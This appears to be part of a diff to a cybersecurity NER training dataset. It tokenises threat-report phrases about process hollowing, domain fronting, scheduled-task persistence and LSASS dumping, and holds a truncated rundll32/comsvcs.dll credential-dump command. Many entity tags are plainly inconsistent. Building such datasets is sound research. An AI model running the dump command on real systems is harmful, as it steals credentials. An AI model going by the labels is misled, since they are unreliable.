"ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "suspend", + "the", + "remote", + "process", + "threads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "injected", + "process" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "goes", + "through", + "processes", + "one", + "by", + "one" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "steal", + "victims’", + "sensitive", + "data." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "injects", + "its", + "main", + "bot", + "into", + "a", + "hollowed", + "instance", + "of", + "svchost.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "implemented", + "process", + "hollowing", + "by", + "first", + "using", + "VirtualProtectEx", + "on", + "the", + "process", + "entrypoint,", + "and", + "then", + "writing", + "the", + "hook", + "stub", + "using", + "WriteProcessMemory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Process", + "hollowing", + "is", + "a", + "process", + "injection", + "technique", + "that", + "creates", + "a", + "new", + "legitimate", + "process", + "in", + "a", + "suspended", + "mode,", + "unmaps", + "its", + "main", + "image", + "and", + "replaces", + "it", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malicious", + "code", + "is", + "written", + "into", + "the", + "newly", + "created", + "process", + "and", + "the", + "suspended", + "thread", + "context", + "instruction", + "pointer", + "is", + "changed", + "using", + "NtGetContextThread/NtSetContextThread." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "for", + "process", + "hollowing", + "from", + "a", + "WoW64", + "process", + "into", + "a", + "64-bit", + "svchost.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Evasive", + "Process", + "Hollowing", + "By", + "Entrypoint", + "Patching" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Evasive", + "Process" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Evasive", + "Process", + "Hollowing", + "by", + "Entrypoint", + "Patching" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Decompresses", + "a", + "local", + "buffer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Common", + "injection", + "methods", + "used", + "by", + "banking", + "Trojans", + "involve", + "writing", + "a", + "mapped", + "PE", + "into", + "a", + "remote", + "process", + "using", + "WriteProcessMemory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "obscure", + "the", + "call", + "by", + "wiping", + "artifacts", + "from", + "the", + "buffer,", + "such", + "as", + "wiping", + "the", + "PE", + "header." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "malware", + "disguised", + "as", + "Hancom", + "Office", + "document", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“Who", + "and", + "What", + "Threatens", + "the", + "World", + "(Column).exe”", + "and", + "is", + "designed", + "to", + "deceive", + "users", + "by", + "using", + "an", + "icon", + "that", + "is", + "similar", + "to", + "that", + "of", + "Hancom", + "Office." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "a", + "folder", + "named", + "onedrivenew", + "in", + "the", + "AppData", + "directory", + "and", + "self-copying", + "itself", + "with", + "the", + "filename", + "onedrivenew.exe", + "to", + "appear", + "as", + "a", + "normal", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "malware", + "creating", + "and", + "executing", + "a", + "normal", + "Hancom", + "Office", + "file", + "with", + "the", + "same", + "filename", + "as", + "the", + "malware", + "within", + "the", + "same", + "directory", + "where", + "the", + "malware", + "was", + "executed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "connect", + "to", + "a", + "certain", + "URL", + "every", + "60", + "minutes", + "using", + "the", + "normal", + "Windows", + "file", + "mshta.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "URL", + "registered", + "in", + "the", + "task", + "scheduler", + "appears", + "to", + "be", + "a", + "normal", + "homepage" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decompressing", + "the", + "compressed", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decompressing" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "injected", + "and", + "executed", + "within", + "the", + "normal", + "Windows", + "process", + "called", + "mstsc.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "of", + "mstsc.exe", + "being", + "executed", + "after", + "being", + "injected", + "with", + "malware" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deleted", + "using", + "the", + "cmd", + "command." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "registers", + "its", + "file", + "with", + "the", + "name", + "onedrivenew", + "under", + "the", + "Run", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "registers", + "its", + "file", + "with", + "the", + "name", + "onedrivenew", + "under", + "the", + "Run", + "key", + "in", + "order", + "to", + "make", + "it", + "run", + "after", + "the", + "system", + "is", + "rebooted." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "schtasks.exe", + "command", + "to", + "register", + "the", + "file", + "to", + "the", + "task", + "scheduler", + "with" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "URL", + "registered", + "in", + "the", + "task", + "scheduler" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "connect", + "to", + "a", + "certain", + "URL", + "every", + "60", + "minutes", + "using", + "the", + "normal", + "Windows", + "file", + "mshta.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "using", + "an", + "obfuscated", + "Meterpreter", + "stager" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "One", + "of", + "the", + "techniques", + "to", + "conceal", + "the", + "traffic", + "from", + "DNS-based", + "filtering", + "is", + "Domain", + "Fronting." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Domain", + "fronting", + "uses", + "legitimate", + "or", + "high-reputation", + "domains", + "to", + "remain", + "undetected", + "by", + "defenders." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "domains", + "for", + "domain", + "fronting", + "may", + "indicate", + "an", + "interest", + "in", + "the", + "geopolitics", + "of", + "this", + "area", + "of", + "the", + "world." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "domain", + "fronting", + "functionality", + "before", + "launching", + "the", + "attack." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "The", + "actor", + "in", + "this", + "campaign", + "has", + "used", + "domain", + "fronting,", + "which", + "is", + "a", + "technique", + "which", + "can", + "use", + "high", + "reputation", + "domains", + "to", + "conceal", + "the", + "Cobalt", + "Strike", + "command", + "and", + "control", + "traffic." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "B-OffAct", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Domain", + "fronting", + "can", + "be", + "achieved", + "with", + "a", + "redirect", + "between", + "the", + "malicious", + "server", + "and", + "the", + "target." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "actors", + "may", + "misuse", + "various", + "content", + "delivery", + "networks", + "(CDNs)", + "to", + "set", + "up", + "redirects", + "of", + "serving", + "content", + "to", + "the", + "content", + "served", + "by", + "attacker-controlled", + "C2", + "hosts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "beacons", + "are", + "of", + "particular", + "interest", + "due", + "to", + "the", + "domain", + "fronting", + "technique", + "using", + "a", + "government", + "host", + "as", + "the", + "initial", + "DNS", + "lure." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "DNS", + "request", + "for", + "the", + "initial", + "host", + "resolves", + "to", + "a", + "Cloudflare-owned", + "IP", + "address", + "that", + "allows", + "the", + "attacker", + "to", + "employ", + "domain", + "fronting", + "and", + "send", + "the", + "traffic", + "to", + "the", + "actual", + "C2", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Domain", + "fronting", + "is", + "a", + "technique", + "used", + "by", + "attackers", + "to", + "circumvent", + "protection", + "based", + "on", + "DNS", + "filtering." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "modify", + "the", + "subsequent", + "HTTPs", + "requests", + "header", + "to", + "instruct", + "the", + "CDN", + "to", + "direct", + "the", + "traffic", + "to", + "an", + "attacker-controlled", + "host." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "in", + "this", + "case", + "uses", + "domain", + "fronting", + "with", + "the", + "Cloudflare", + "Content", + "Delivery", + "Network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + ".]net", + "via", + "HTTP", + "Get", + "and", + "POST", + "metadata", + "specified", + "in", + "the", + "beacon's", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "relies", + "on", + "other", + "parts", + "of", + "the", + "HTTP", + "request,", + "including", + "the", + "Host", + "header", + "and", + "the", + "actual", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "suspicious", + "section", + ".kxrt", + "with", + "the", + "packed", + "and", + "encoded", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decryption", + "routine", + "is", + "executed", + "that", + "decrypts", + "the", + "remaining", + "malicious", + "code", + "in", + "the", + ".kxrt", + "section", + "and", + "writes", + "it", + "to", + "the", + "virtual", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decoder", + "routine", + "to", + "decrypt", + "the", + "beacon", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "malicious", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "decoded,", + "the", + "loader's", + "execution", + "jumps", + "to", + "the", + "beginning", + "of", + "the", + "DLL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "now", + "responsible", + "for", + "decoding", + "the", + "configuration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "calling", + "WinHTTPGetProxyForUrlEx", + "and", + "WinHTTPCreateProxyResolver" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "calls", + "the", + "VirtualProtect", + "function" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "modifies", + "the", + "victim's", + "system", + "power", + "and", + "lid", + "open/close", + "policies", + "in", + "the", + "registry." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "can", + "also", + "manage", + "the", + "system", + "power", + "policies", + "registry", + "keys", + "to", + "set", + "the", + "minimum", + "and", + "maximum", + "sleep", + "times", + "and", + "the", + "lid", + "open", + "and", + "close", + "action", + "policy." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "routed", + "through", + "European", + "TOR", + "VPN", + "exit", + "nodes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "VPN", + "access", + "using", + "Single", + "Factor", + "authentication." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Minidump", + "of", + "LSASS", + "process", + "memory" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "minidump", + "function", + "of", + "comsvcs.dll", + "can", + "be", + "used", + "to", + "dump", + "lsass.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "leveraging", + "comsvcs.dll", + "with", + "proxy", + "execution", + "by", + "rundll32.exe." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "do", + "rundll32.exe", + "C:\\windows\\System32\\comsvcs.dll," + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Conducting", + "discovery", + "indirectly", + "via", + "schedule", + "tasks", + "named", + "“Windows", + "Update”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam" + ] + }, + { + "tokens": [ + "performing", + "remote", + "directory", + "listings." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "discover", + "interesting", + "to", + "them", + "directories" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Leveraging", + "a", + "dual-use", + "tool,", + "PCHunter64,", + "to", + "acquire", + "detailed", + "process", + "and", + "system", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "can", + "use", + "windows", + "binaries", + "and", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDP", + "connection", + "established" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Remote", + "Desktop", + "Protocol", + "(RDP),", + "and", + "the", + "threat", + "actor", + "was", + "able", + "to", + "move", + "freely", + "across", + "the", + "network" + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "was", + "able", + "to", + "RDP", + "unencumbered", + "across", + "the", + "organization’s", + "infrastructure." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actor", + "executed", + "two", + "actions", + "to", + "bypass", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "leveraged", + "one", + "of", + "the", + "most", + "popular", + "dual-use", + "agents,", + "AnyDesk,", + "to", + "provide", + "persistent", + "remote", + "access", + "into", + "the", + "affected", + "organization", + "on", + "multiple", + "systems." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Purp", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "several", + "files", + "were", + "staged", + "for", + "possible,", + "but", + "unconfirmed", + "exfiltration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spear", + "phishing", + "emails", + "that", + "contain", + "a", + ".csv", + "or", + ".xlt", + "file", + "attachment" + ], + "ner_tags": [ + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "email", + "is", + "directed", + "to", + "“Non-Resident", + "Alien”", + "tax", + "payers", + "to", + "have", + "them", + "fill", + "out", + "a", + "PDF", + "file", + "(that", + "is", + "attached", + "to", + "the", + "email)" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "a", + "cyber-attack", + "in", + "the", + "form", + "of", + "credential", + "stuffing," + ], + "ner_tags": [ + "O", + "B-Org", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Enduring", + "Credential", + "Stuffing" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "login", + "credentials", + "from", + "what", + "the", + "company", + "suspects", + "are", + "past", + "data", + "breaches", + "from", + "other", + "companies" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "replace", + "the", + "“ServiceManager.exe”", + "file", + "from", + "the", + "driver", + "folder", + "with", + "a", + "malicious", + "file", + "to", + "trick", + "the", + "driver", + "into", + "running", + "the", + "tainted", + "file" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "log", + "keystrokes" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "vulnerability", + "in", + "unencrypted", + "Wi-Fi", + "routers", + "that", + "makes", + "them", + "susceptible", + "to", + "a", + "TCP", + "exploit." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp" + ] + }, + { + "tokens": [ + "A", + "threat", + "actor", + "could", + "take", + "advantage", + "of", + "this", + "vulnerability", + "by", + "creating", + "a", + "specific", + "file", + "that", + "contains", + "data", + "that", + "is", + "stored", + "in", + "the", + "JET", + "database", + "format,", + "and", + "having", + "the", + "targeted", + "user", + "open", + "it,", + "which", + "would", + "then", + "allow", + "for", + "remote", + "code", + "execution", + "at", + "the", + "level", + "of", + "the", + "current", + "process" + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "vulnerability,", + "registered", + "as", + "“CVE-2018-14327,”", + "allows", + "a", + "low-privileged", + "user", + "account", + "to", + "escalate", + "privileges", + "on", + "any", + "Windows", + "machine", + "that", + "had", + "connected", + "to", + "the", + "EE", + "Mini", + "modem", + "via", + "USB." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "that", + "specific", + "payload", + "code" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "threat", + "actor", + "could", + "establish", + "an", + "administrator", + "session" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "payload", + "download", + "code", + "that", + "grabs", + "malware", + "to", + "download", + "and", + "install", + "the", + "backdoor." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "sign", + "on", + "as", + "a", + "legitimate", + "user" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "database", + "passwords", + "from", + "Windows", + "registry", + "values" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "them", + "from", + "Windows", + "registry", + "values" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "more", + "sensitive", + "data", + "in", + "the", + "user’s", + "database." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "these", + "database", + "passwords," + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "password" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "dba", + "user", + "password." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "this", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "the", + "appropriate", + "loader" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "them" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "gather", + "database", + "passwords" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "steal", + "database", + "passwords", + "and", + "configuration", + "information" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "steal", + "credentials", + "by", + "decrypting", + "them", + "from", + "registry", + "values." + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exfiltrated", + "credentials" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "decrypt", + "these", + "database", + "passwords" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "password", + "for", + "the", + "dba", + "username" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "dba", + "user", + "password." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "successfully", + "obtain", + "the", + "database", + "passwords" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "steal", + "credentials", + "by", + "decrypting", + "them", + "from", + "registry", + "values" + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encryption", + "key", + "for", + "sensitive", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "encryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "encryption" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "XORed", + "with", + "the", + "value" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "using", + "its", + "own", + "XOR", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "write", + "module", + "to", + "the", + "encrypted", + "storage" + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpacks", + "and", + "loads", + "the", + "next", + "stage", + "of", + "the", + "malware,", + "namely", + "the", + "main", + "module" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "unpacking", + "the", + "main", + "module", + "and" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "handles", + "communication", + "between", + "the", + "modules", + "and", + "attacker’s", + "C&C", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O" + ] + }, + { + "tokens": [ + "0x10000013data", 